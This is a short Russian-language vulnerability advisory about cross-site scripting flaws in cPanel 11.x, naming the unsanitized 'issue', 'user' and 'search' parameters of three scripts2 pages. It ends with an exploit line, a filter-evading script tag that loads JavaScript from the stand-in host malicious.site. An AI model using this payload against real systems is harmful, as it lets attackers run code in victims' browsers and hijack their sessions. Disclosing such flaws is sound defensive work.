Программа: cPanel 11.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки данных в параметре "issue" сценарием scripts2/knowlegebase, в параметре "user" сценарием scripts2/changeip, и в параметре "search" сценарием scripts2/listaccts. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Эксплоит:

>><<<<<<<<<<<<script src="http://malicious.site/code.js" a=>>>>>>>><

Оставить мнение